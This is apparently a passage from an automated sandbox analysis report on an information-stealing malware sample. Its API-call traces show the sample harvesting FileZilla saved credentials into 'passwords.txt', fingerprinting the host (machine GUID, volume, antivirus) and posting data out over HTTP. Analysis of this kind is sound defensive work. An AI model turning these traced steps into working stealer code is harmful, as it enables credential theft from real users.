                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$FileOpenReadRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                                                                                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                        • API String ID: 1135472144-3618031631
                                                                                                                                                                                                                                        • Opcode ID: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
                                                                                                                                                                                                                                        • Instruction ID: db5541188cdc9f639a804d86c40747d3c4d91d865bd81aad25c9fe7a46c42329
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e815b3ad2264143bb48ae0f0fc906797d55cb53abbd96dc878e8bdd3ba56be44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20624471800249EADB15EBE5C951BEEBBB8AF19304F5041AEF50173182DE786B4CCB79
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
                                                                                                                                                                                                                                          • Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9
                                                                                                                                                                                                                                          • Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040CAE9
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00427B47,00427B46,00427B43,00427B42), ref: 0040CB3F
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB46
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CD55
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CD77
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040CE3B
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040CEA5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                        • API String ID: 433178851-1966776650
                                                                                                                                                                                                                                        • Opcode ID: f405c95e2274f6d26f8ca5c4a1d56def5a07e81201ba6dc32980dd9eb2c7a1c6
                                                                                                                                                                                                                                        • Instruction ID: d3b6116b1b73df3cabd5054aa1a62d8a43f82c6421f78d5ef7e496df56dda141
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f405c95e2274f6d26f8ca5c4a1d56def5a07e81201ba6dc32980dd9eb2c7a1c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CE1A175904219EACB04EBA0DC56BEEBB78AF19304F50056EF901731C2DF786A48C769
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 574 405c90-405d82 call 40fec0 call 4043c0 call 40fe80 * 5 call 410120 InternetOpenA StrCmpCA 591 405d84 574->591 592 405d8b-405d8d 574->592 591->592 593 405d93-405f11 call 4114d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ffb0 call 40ff60 call 40ff00 * 2 InternetConnectA 592->593 594 40646f-406490 InternetCloseHandle call 410120 call 406f10 592->594 680 405f17-405f4f HttpOpenRequestA 593->680 681 40646c 593->681 604 406492-4064bf call 40ff10 call 410040 call 40ff60 call 40ff00 594->604 605 4064c4-406558 call 411400 * 2 call 40ff00 * 9 594->605 604->605 682 406465-406466 InternetCloseHandle 680->682 683 405f55-405f59 680->683 681->594 682->681 684 405f71-406400 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4023c0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 40ffb0 call 40ff60 call 40ff00 call 410120 lstrlen call 410120 lstrlen GetProcessHeap HeapAlloc call 410120 lstrlen call 410120 memcpy call 410120 lstrlen call 410120 * 2 lstrlen memcpy call 410120 lstrlen call 410120 HttpSendRequestA InternetReadFile 683->684 685 405f5b-405f6b InternetSetOptionA 683->685 846 406402-406407 684->846 847 406458-406462 InternetCloseHandle 684->847 685->684 846->847 848 406409-406456 call 410040 call 40ff60 call 40ff00 InternetReadFile 846->848 847->682 848->846 848->847
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405F44
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,004205B9,?,00000000,004205B9,",00000000,004205B9,mode,00000000,004205B9,014622F8,00000000,004205B9,004279E8), ref: 00406342
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406353
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040635E
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406365
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406376
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00406387
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406398
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063B1
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 004063BA
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004063CD
                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063E1
                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 004063F8
                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040644E
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406459
                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406466
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406470
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 00405D7A
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                        • String ID: "$"$"$*$------$------$------$------$build_id$mode
                                                                                                                                                                                                                                        • API String ID: 530647464-3630346487
                                                                                                                                                                                                                                        • Opcode ID: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
                                                                                                                                                                                                                                        • Instruction ID: 80b1796918ec1c29b6be473428c1b8ad95fa748133d466919d2d563d3e35a917
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A526271801249EADB15E7E5C952BEEBBB89F19304F2440AEF50173182DE786B4CCB79
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 855 4158f0-41673e call 40fe80 call 410040 call 40ff60 call 40ff00 call 402390 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410300 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410c90 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410d30 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410d90 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 GetCurrentProcessId call 411a40 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410f40 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4110a0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 411260 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4102c0 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410280 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410c10 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4103d0 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410300 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410360 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410530 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4105e0 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4105a0 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 4106e0 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410750 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410b00 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410040 call 40ff60 call 40ff00 call 410860 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410860 call 40ffb0 call 40ff60 call 40ff00 * 2 call 410040 call 40ff60 call 40ff00 call 410120 lstrlen call 410120 call 40fe80 call 401130 call 415650 call 40ff00 * 6
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
                                                                                                                                                                                                                                          • Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
                                                                                                                                                                                                                                          • Part of subcall function 00410300: GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
                                                                                                                                                                                                                                          • Part of subcall function 00410300: wsprintfA.USER32 ref: 0041034D
                                                                                                                                                                                                                                          • Part of subcall function 00410C90: memset.MSVCRT ref: 00410CB5
                                                                                                                                                                                                                                          • Part of subcall function 00410C90: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
                                                                                                                                                                                                                                          • Part of subcall function 00410C90: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
                                                                                                                                                                                                                                          • Part of subcall function 00410C90: CharToOemA.USER32(00000000,?), ref: 00410D12
                                                                                                                                                                                                                                          • Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
                                                                                                                                                                                                                                          • Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004283E8,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C2B
                                                                                                                                                                                                                                          • Part of subcall function 00411A40: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
                                                                                                                                                                                                                                          • Part of subcall function 00411A40: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
                                                                                                                                                                                                                                          • Part of subcall function 00411A40: CloseHandle.KERNEL32(00000000), ref: 00411A7E
                                                                                                                                                                                                                                          • Part of subcall function 00410F40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
                                                                                                                                                                                                                                          • Part of subcall function 00410F40: HeapAlloc.KERNEL32(00000000), ref: 00410F5C
                                                                                                                                                                                                                                          • Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
                                                                                                                                                                                                                                          • Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
                                                                                                                                                                                                                                          • Part of subcall function 004110A0: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
                                                                                                                                                                                                                                          • Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
                                                                                                                                                                                                                                          • Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411186
                                                                                                                                                                                                                                          • Part of subcall function 00411260: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
                                                                                                                                                                                                                                          • Part of subcall function 00411260: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
                                                                                                                                                                                                                                          • Part of subcall function 00411260: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
                                                                                                                                                                                                                                          • Part of subcall function 00411260: CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
                                                                                                                                                                                                                                          • Part of subcall function 00411260: VariantInit.OLEAUT32(?), ref: 00411342
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7
